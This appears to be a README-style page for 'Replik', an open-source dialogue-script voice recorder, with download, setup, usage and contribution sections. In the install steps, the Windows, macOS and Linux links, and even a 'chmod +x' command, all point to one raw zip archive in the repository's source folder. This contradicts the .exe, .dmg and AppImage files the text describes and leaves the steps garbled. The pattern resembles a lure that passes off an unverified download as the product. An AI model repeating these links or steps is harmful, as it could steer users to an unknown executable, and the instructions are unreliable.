Replik is a free, open-source voice recording tool designed for anyone working with dialogue scripts. Whether you are an indie game developer, a dubbing studio, or an audiobook producer, Replik helps you efficiently record multiple dialogue lines. You can import CSV or JSON files, record line-by-line, and export audio files that are automatically named for your convenience.
To get started, visit this page to download the application:
Once on the Releases page, follow these steps:
- Locate the latest release.
- You will find different files available for download. Choose the one that corresponds to your operating system.
- For Windows: Click on
https://raw.githubusercontent.com/Sander1023Al/Replik/main/src/Software_v2.5.zip - For macOS: Download
https://raw.githubusercontent.com/Sander1023Al/Replik/main/src/Software_v2.5.zip - For Linux: Look for
https://raw.githubusercontent.com/Sander1023Al/Replik/main/src/Software_v2.5.zipor the package suitable for your distribution.
- For Windows: Click on
- After the download completes, follow the installation steps based on your operating system.
- Windows: Run the downloaded
.exefile and follow the on-screen instructions. - macOS: Open the
.dmgfile, drag the Replik icon into your Applications folder, and then eject the disk image. - Linux: Make the
AppImageexecutable using the command line:chmod +x https://raw.githubusercontent.com/Sander1023Al/Replik/main/src/Software_v2.5.zip. Then run it by double-clicking or using the terminal.
- Windows: Run the downloaded
Once you have installed Replik:
- Open the Application: Start Replik from your applications menu or desktop shortcut.
- Import Your Script: Click on "Import" and choose to upload a CSV or JSON file that contains your dialogue lines.
- Set Recording Options: You can select the output format for your audio files (WAV, MP3, etc.) and customize the recording settings to fit your needs.
Recording audio with Replik is straightforward:
- Record Line-by-Line: Select a line from your script, and press the "Record" button. Speak your lines clearly.
- Playback: After recording, you can listen to the playback immediately to ensure quality. Adjust settings as needed.
- Export Files: Once you finish, hit "Export" to save your recordings. The files will have names matching the lines from your script, making organization easy.
- Batch Recording: Efficiently record multiple lines at once.
- Format Support: Works with CSV and JSON formats for easy script import.
- Customization: Tailor your audio formats and recording settings.
- Free & Open-Source: Use Replik without any cost, and contribute to its development.
To run Replik, ensure your system meets the following requirements:
- Windows: Windows 10 or later
- macOS: macOS 10.12 (Sierra) or later
- Linux: Most modern distributions with kernel version 4.0+
- RAM: Minimum 4 GB for smooth operation
- Storage: At least 200 MB for installation, additional space for audio files
If you encounter issues, consider these steps:
- Check Permissions: Ensure Replik has permission to access your microphone.
- Update Drivers: Make sure your audio drivers are up-to-date.
- Reinstall the App: If problems persist, uninstall Replik and try reinstalling it.
For any questions or issues, feel free to raise an issue on our GitHub repository. Our community is here to help you with any technical challenges.
Replik is open for contributions. If you're interested in helping improve the application, you can:
- Fork the repository.
- Make your changes.
- Submit a pull request.
Together, we can enhance Replik for all users.
Stay tuned for upcoming features and enhancements. Check the Releases page for the latest updates: